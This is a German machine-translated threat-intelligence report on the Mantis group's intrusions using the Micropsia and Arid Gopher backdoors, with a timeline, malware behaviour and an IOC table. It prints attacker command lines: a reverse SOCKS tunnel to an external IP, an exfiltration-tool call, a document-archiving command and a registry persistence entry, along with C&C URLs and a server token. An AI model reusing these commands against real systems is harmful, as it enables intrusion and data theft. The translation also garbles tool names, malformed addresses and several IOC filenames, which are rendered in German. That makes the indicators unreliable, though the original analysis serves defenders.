Kontexte
Mantis ist seit 2014 aktiv, wobei einige Berichte von Dritten darauf hindeuten, dass die Gruppe bereits seit 2011 aktiv war. Die Gruppe ist dafür bekannt, dass sie Organisationen in Israel und mehreren anderen Ländern des Nahen Ostens angreift. Zu den Zielbereichen gehören Regierung, Militär, Finanzen, Medien, Bildung, Energie und Think Tanks. Die Gruppe ist dafür bekannt, dass sie Phishing-E-Mails und gefälschte Social-Media-Profile verwendet, um die Zielpersonen zur Installation von Malware auf ihren Geräten zu verleiten.
Es wird allgemein angenommen, dass Mantis Verbindungen zu den palästinensischen Gebieten hat. Symantec ist nicht in der Lage, eine definitive Zuordnung zu einer palästinensischen Organisation vorzunehmen, obwohl andere Anbieter die Gruppe mit der Hamas in Verbindung gebracht haben.
Bei ihrem jüngsten Angriff verwendete die Gruppe aktualisierte Versionen ihrer angepassten Micropsia- und Arid-Gopher-Hintertüren, um Ziele zu infizieren, gefolgt von einem weit verbreiteten Diebstahl von Anmeldeinformationen und der Exfiltration gestohlener Daten.
Angriffskette
Der anfängliche Infektionsweg für diese Kampagne ist unklar. In einer der angegriffenen Organisationen setzten die Angreifer drei verschiedene Versionen desselben Toolsets (d. h. verschiedene Varianten desselben Tools) auf drei Computersätzen ein. Die Isolierung des Angriffs auf diese Weise ist wahrscheinlich eine Vorsichtsmaßnahme. Wenn eines der Toolsets entdeckt wird, kann der Angreifer seine Präsenz im Zielnetz weiterhin aufrechterhalten.
Nachstehend finden Sie eine Beschreibung der Verwendung eines der drei Toolsets:
Die erste bösartige Aktivität wurde am 18. Dezember 2022 entdeckt. Drei separate Sätze verschleierter PowerShell-Befehle wurden ausgeführt, um eine Base64-kodierte Zeichenfolge zu laden, die den eingebetteten Shellcode startete. Der Shellcode ist ein 32-Bit-Bootloader, der das grundlegende TCP-Protokoll verwendet, um den Shellcode vom Command-and-Control-Server (C&C) herunterzuladen: 104.194.222[...] 50 Port 4444, um eine weitere Stufe herunterzuladen.
Die Angreifer kehrten am 19. Dezember zurück, führten zunächst einen Dump der Anmeldeinformationen durch und nutzten dann Certutil und BITSAdmin, um die Micropsia-Backdoor und Putty, einen öffentlich verfügbaren SSH-Client, herunterzuladen.
Micropsia wurde dann ausgeführt und nahm Kontakt mit dem C&C-Server auf. Am selben Tag wurde Micropsia auch auf drei anderen Rechnern in derselben Organisation ausgeführt. In jedem Fall wurde er in einem Ordner ausgeführt, der nach seinem Dateinamen benannt war:
csidl_common_appdata\systempropertiesinternationalaltime\systempropertiesinternationalaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
Auf einem Computer wurde Micropsia verwendet, um einen Reverse-Socks-Tunnel zu einer externen IP-Adresse einzurichten:
CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.] 50:443 [bearbeitet]
Am 20. Dezember wurde Micropsia verwendet, um eine unbekannte ausführbare Datei namens windowspackages.exe auf einem der infizierten Computer auszuführen.
Am folgenden Tag, dem 21. Dezember, wurde RAR ausgeführt, um Dateien auf einem anderen infizierten Computer zu archivieren.
Vom 22. Dezember bis zum 2. Januar 2023 wurde Micropsia verwendet, um die Backdoor Arid Gopher auf drei infizierten Computern auszuführen. Arid Gopher wurde wiederum verwendet, um ein Tool namens SetRegRunKey.exe auszuführen, das die Ausführung von Arid Gopher bei einem Neustart ermöglicht, indem es der Registrierung hinzugefügt wird, um eine Aufrechterhaltung. Es führt auch eine unbekannte Datei namens localsecuritypolicy.exe aus (der Angreifer verwendet diesen Dateinamen an anderer Stelle als Arid Gopher-Backdoor).
Am 28. Dezember wurde Micropsia verwendet, um windowspackages.exe auf drei weiteren infizierten Computern auszuführen.
Am 31. Dezember führte Arid Gopher zwei unbekannte Dateien mit den Namen networkswitcherdatamodell.exe und networkuefidiagsbootserver.exe auf zwei infizierten Computern aus.
Am 2. Januar hatten die Angreifer die von ihnen verwendete Version von Arid Gopher deaktiviert und eine neue Variante eingeführt. Ob dies darauf zurückzuführen war, dass die erste Version entdeckt wurde, oder ob es sich um eine Standardprozedur handelte, ist unklar.
Am 4. Januar wurden mit Hilfe von Micropsia zwei unbekannte Dateien mit dem Namen hostupbroker.exe aus dem Ordner csidl_common_appdata\hostupbroker\hostupbroker.exe auf einem einzigen Computer ausgeführt, woraufhin die RAR-Datei durchsickerte:
CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\01-04-2023-15-13-39_getf.rar
Am 9. Januar wurde Arid Gopher verwendet, um zwei unbekannte Dateien auf einem einzigen Computer auszuführen:
csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
csidl_common_appdata\embeddedmodeservice\embeddedmodeservice.exe
Die letzte bösartige Aktivität fand nach dem 12. Januar statt, als Arid Gopher verwendet wurde, um den unbekannten Dateinamen localsecuritypolicy.exe alle zehn Stunden auszuführen.
Micropsia
Bei der in diesen Angriffen verwendeten Micropsia-Backdoor-Variante scheint es sich um eine leicht aktualisierte Version der von anderen Anbietern beobachteten Version zu handeln. In dieser Kampagne wurde Micropsia unter Verwendung mehrerer Dateinamen und Dateipfade eingesetzt:
csidl_common_appdata\microsoft\dotnet35\microsoftdotnet35.exe
csidl_common_appdata\microsoftservicesusermanual\systempropertiesinternationalaltime.exe
csidl_common_appdata\systempropertiesinternationalaltime\systempropertiesinternationalaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
Micropsia verwendet WMI zur Ausführung, und sein Hauptzweck scheint darin zu bestehen, die sekundären Nutzlasten des Angreifers auszuführen. Dazu gehören:
Arid Gopher (Dateinamen: networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)
Reverse SOCKs Tunneler (alias Revsocks) (Dateiname: windowsservicemanageav.exe)
Tool zur Datenexfiltration (Dateiname: windowsupserv.exe)
Zwei unbekannte Dateien, beide mit dem Namen hostupbroker.exe
Unbekannter Dateiname windowspackages.exe
Darüber hinaus verfügt Micropsia über eigene Funktionen wie Screenshots, Keylogging und die Archivierung bestimmter Dateitypen mit WinRAR zur Vorbereitung auf einen Datenverlust:
"%PROGRAMDATA%\Software Distributions\WinRAR\Rar.exe" a-r -ep1 -v2500k - hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 "%PROGRAMDATA%\Software Verteilungen\Bdl\LMth__C_2023-02-13 17-14-41" "%USERPROFILE%*.xls" " %USERPROFILE%*.xlsx" "%USERPROFILE%*.doc" "%USERPROFILE%*. docx" "%USERPROFILE%*.csv" "%USERPROFILE%*.pdf" "%USERPROFILE%*.ppt" "%USERPROFILE%*.pptx" " %USERPROFILE%*.odt" "%USERPROFILE%*.mdb" "%USERPROFILE%*. accdb" "%USERPROFILE%*.accde" "%USERPROFILE%*.txt" "%USERPROFILE%*.rtf" "%USERPROFILE%*.vcf"
Aridengopher
Im Gegensatz zu Micropsia, das in Delphi geschrieben ist, ist Arid Gopher in Go geschrieben. Die in dieser Kampagne verwendete Version von Arid Gopher enthält die folgenden eingebetteten Komponenten:
7za.exe - eine legale Kopie der ausführbaren 7-Zip-Datei
AttestationWmiProvider.exe - ein Dienstprogramm zum Festlegen des Registrierungswerts "Run".
ServiceHubIdentityHost.exe - Optimum X's Kopie der legalen Shortcut.exe ausführbaren Datei
Setup.env - Konfigurationsdatei
Arid Gopher wird auch zum Starten der folgenden unbekannten Dateien verwendet: networkswitcherdatamodell.exe, localsecuritypolicy.exe und networkuefidiagsbootserver.exe, zusätzlich zum Herunterladen und Ausführen von Dateien, die mit dem PyArmor-verschleierte Dateien.
Bei der Kommunikation mit dem C&C-Server registriert Arid Gopher das Gerät auf einem Pfad und stellt dann eine Verbindung zu einem anderen her, möglicherweise um Befehle zu empfangen:
Verbindung zu: http://jumpstartmail[.] com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.] 134) - möglicherweise, um das Gerät zu registrieren
Gefolgt von: http://jumpstartmail[...] com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - wahrscheinlich, um den Befehl zu erhalten
Verbindung zu: http://salimafia[.] net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.] 32) - Möglicherweise, um das Gerät zu registrieren
Gefolgt von: http://salimafia[...] net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - wahrscheinlich, um den Befehl
Arid Gopher scheint von den Angreifern regelmäßig aktualisiert und umgeschrieben worden zu sein, wahrscheinlich um der Entdeckung zu entgehen. Eine Variante der Malware unterscheidet sich so stark vom eindeutigen Code früherer Versionen, dass keines der Unterprogramme denselben eindeutigen Code wie die vorherige Version enthält. Mantis scheint die Logik aktiv zwischen den Varianten zu wechseln, was ein zeitaufwändiger Vorgang ist, wenn er manuell durchgeführt wird.
| Befehl | Beschreibung |
|---|---|
| "c" | Vielleicht im Zusammenhang mit main.exC("cmd") |
| "d" | Vielleicht im Zusammenhang mit main.down2 |
| "s" | Vielleicht im Zusammenhang mit main.OnDSH |
| "ci" | Vielleicht im Zusammenhang mit main.deviceProperties |
| "ps" | Vielleicht im Zusammenhang mit main.exC("powershell") |
| "ra" | Möglicherweise im Zusammenhang mit main.RunAWithoutW |
| "sf" | Vielleicht im Zusammenhang mit main.updateSettings |
| "sl" | Vielleicht im Zusammenhang mit main.searchForLogs |
| "ua" | Vielleicht im Zusammenhang mit main.updateApp |
| "ut" | Vielleicht im Zusammenhang mit main.updateT |
| "pwnr" | Vielleicht im Zusammenhang mit main.exCWithoutW("powershell") |
| "rapp" | Vielleicht im Zusammenhang mit main.restartApp |
| "gelog" | Vielleicht im Zusammenhang mit main.upAppLogs |
| "ufbtt" | Vielleicht im Zusammenhang mit main.collectFi |
| "ufofd" | Vielleicht im Zusammenhang mit main.collectFiOrFol |
| "bwp" | Vielleicht verwandt mit main.browDat |
| "cbh" | Vielleicht im Zusammenhang mit main.delBD |
| "cwr" | Vielleicht im Zusammenhang mit main.exCWithoutW("cmd") |
| "gaf" | Vielleicht im Zusammenhang mit main.collectFi |
| "ntf" | Vielleicht im Zusammenhang mit main.collectNet |
| "smr" | Vielleicht im Zusammenhang mit main.updateSettings |
Die eingebettete Datei setup.env wird von einer analysierten Variante von Arid Gopher zum Abrufen von Konfigurationsdaten verwendet und enthält Folgendes:
DIR=WindowsPerceptionService
ENDPOINT=http://jumpstartmail[.] com/IURTIER3BNV4ER
LOGS=logs.txt
DID=code.txt
VER=6.1
DE=2
ST_METHOD=r
ST_MACHINE=false
ST_FLAGS=x
KOMPRESSOR=7za.exe
DDIR=ResourcesFiles
BW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002
SERVER_TOKEN=PDqMKZ91l2XDmDELOrKB
STAPP=AttestationWmiProvider.exe
SHORT_APP=ServiceHubIdentityHost.exe
Die Konfigurationsdatei setup.env verweist auf eine weitere Datei, AttestationWmiProvider.exe, die ebenfalls in Arid Gopher enthalten ist. Bei dieser Datei handelt es sich um eine ausführbare 32-Bit-Datei, die als Hilfsprogramm dient, um sicherzustellen, dass die andere ausführbare Datei beim Neustart ausgeführt wird. Bei der Ausführung werden die folgenden Befehlszeilenparameter überprüft:
"Schlüssel" mit String-Argument [RUN_VALUE_NAME]
"Wert" mit String-Argument [RUN_PATHNAME]
Anschließend wird mit der Funktion os/signal.Notify() eine Benachrichtigung von dem Signal empfangen. Sobald es die Benachrichtigung erhält, setzt es den folgenden Registrierungswert:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "[RUN_VALUE_NAME]" = "[RUN_ PATHNAME]"
Unsere bisherigen Untersuchungen haben ergeben, dass diese Datei Arid Gopher so einstellt, dass es bei einem Neustart läuft:
CSIDL_COMMON_APPDATA\attestationwmiprovider\attestationwmiprovider.exe -key=NetworkVirtualisationStartService "-value= CSIDL_COMMON_APPDATA\networkvirtualisationstartservice\networkvirtualizationstartservice.exe -x"
Datenleck-Tool
Die Angreifer verwendeten außerdem ein benutzerdefiniertes Tool, um die aus der Zielorganisation gestohlenen Daten zu exfiltrieren: ein 64-Bit-PyInstaller-Executable namens WindowsUpServ.exe. Wenn das Tool ausgeführt wird, überprüft es die folgenden Befehlszeilenparameter:
"-d" "[FILE_DIRECTORY]"
"-f" "[DATEINAME]"
Für jedes Befehlszeilenargument "-f" "[DATEINAME]" lädt das Tool den Inhalt von [DATEINAME] hoch. Für jedes Befehlszeilenargument "-d" "[DATEI_VERZEICHNIS]" ruft das Tool eine Liste der im Ordner [DATEI_VERZEICHNIS] gespeicherten Dateien ab und lädt den Inhalt der einzelnen Dateien hoch.
Beim Hochladen jeder Datei sendet das Tool eine HTTP POST-Anfrage an den C&C-Server mit den folgenden Parametern:
"kjdfnqweb": [THE_FILE_CONTENT]
"qyiwekq": [HOSTNAME_OF_THE_AFFECTED_COMPUTER]
Wenn der Remote-Server mit dem Statuscode 200 antwortet, löscht die Malware die hochgeladenen Dateien von der lokalen Festplatte. Die Malware kann auch einen Teil ihres Verhaltens in den folgenden Dateien aufzeichnen:
"C:\ProgramData\WindowsUpServ\success.txt"
"C:\ProgramData\WindowsUpServ\err.txt"
Ein entschlossener Gegner
Mantis scheint ein entschlossener Angreifer zu sein, der bereit ist, Zeit und Mühe zu investieren, um seine Erfolgschancen zu maximieren. Dies zeigt sich an den umfangreichen Neufassungen der Malware und seiner Fähigkeit, Angriffe auf einzelne Organisationen in mehrere separate Teile aufzuspalten, um die Wahrscheinlichkeit zu verringern, dass die gesamte Operation entdeckt wird.
IOC-Indikatoren
| SHA256-Hash | Name der Datei | Beschreibung |
|---|---|---|
| 0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311 | netzwerkvirtualisierungsdienst.exe | Aridengopher |
| 3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529 | networkvirtualisationpicservice.exe | Aridengopher |
| 82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4 | netzwerkvirtualisierungfiaservice.exe | Aridengopher |
| 85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097 | netzwerkvirtualisierunginithservice.exe | Aridengopher |
| cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341 | netzwerkvirtualisierungfiaservice.exe | Aridengopher |
| f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8 | networkvirtualisationstartservice.exe | Aridengopher |
| 21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8 | AttestationWmiProvider.exe | Persistenzkomponente Arid Gopher |
| 58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724 | windowsupserv.exe | Exfiltrationswerkzeug |
| 5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e | windowsupserv.exe | Exfiltrationswerkzeug |
| 0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038 | Verschiedene | Micropsia |
| 1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa | K.A. | Micropsia |
| 211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d | xboxaccessorymanagementservice.exe | Micropsia |
| d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798 | systemeigenschafteninternationalezeit.exe | Micropsia |
| 5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4 | netzwerkvirtualisierungseoservice.exe | Möglicherweise Arid Gopher |
| f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203 | runme.exe | Möglicher Meterpreter |
| c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b | systemeigenschafteninternationalezeit.exe | Mögliche Mikropsie |
| f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb | windowsservicemanageav.exe | ReverseSocksTunnel |
| 411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299 | K.A. | Shellcode |
| 5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d | K.A. | Shellcode |
| 6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061 | K.A. | Shellcode |
| 11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e | SystemEigenschaftenInternationaleZeit.rar | Unbekannte Datei |
| 1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6 | networkswitcherdatamodell.exe | Unbekannte Datei |
| 220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c | hostupbroker.exe | Unbekannte Datei |
| 4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f | hostupbroker.exe | Unbekannte Datei |
| 4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02 | windowspackages.exe | Unbekannte Datei |
| 624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689 | _pytransform.dll | Unbekannte Datei |
| 7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4 | embeddedmodeservice.exe | Unbekannte Datei |
| 8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2 | localsecuritypolicy.exe | Unbekannte Datei |
| b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3 | embeddedmodeservice.exe | Unbekannte Datei |
| bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51 | localsecuritypolicy.exe | Unbekannte Datei |
| bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9 | netzwerkuefidiagsbootserver.exe | Unbekannte Datei |
| d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842 | teamviewrremoteservice.exe | Unbekannte Datei |
| jumpstartmail[.] com | Arid Gopher C&C | |
| paydayloansnew[.] com | Arid Gopher C&C | |
| bild-welt[.] info | Arid Gopher C&C | |
| rnacgroup[.] com | C&C | |
| salimafia[...] net | Arid Gopher C&C | |
| seomoi[...] net | Arid Gopher C&C | |
| soft-utils[.] com | C&C | |
| chloe-boreman[.] com | Micropsia C&C | |
| criston-cole[.] com | Micropsia C&C | |
| http://5.182.39[.] 44/esuzmwmrtajj/cmsnvbyawttf/mkxnhqwdywbu | Exfiltrationswerkzeug C&C |
Originalartikel von Chief Security Officer, bei Vervielfältigung bitte angeben: https://cncso.com/de/mantis-used-in-attacks-against-palestinian-targets.html
